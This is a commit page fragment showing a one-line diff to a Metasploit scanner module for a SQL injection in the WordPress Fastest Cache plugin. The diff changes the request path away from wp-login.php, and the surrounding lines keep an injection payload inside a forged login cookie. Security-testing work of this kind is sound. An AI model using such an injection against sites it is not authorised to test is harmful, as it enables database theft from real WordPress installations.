We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 63c3a12 commit a687a6cCopy full SHA for a687a6c
modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -57,7 +57,7 @@ def run_host(ip)
57
res = send_request_cgi({
58
'method' => 'GET',
59
'cookie' => "wordpress_logged_in=\" AND (SELECT #{random_number} FROM (SELECT(#{payload}))#{random_table}) AND \"#{random_string}\"=\"#{random_string}",
60
- 'uri' => normalize_uri(target_uri.path, 'wp-login.php')
+ 'uri' => normalize_uri(target_uri.path)
61
})
62
fail_with Failure::Unreachable, 'Connection failed' unless res
63
end
0 commit comments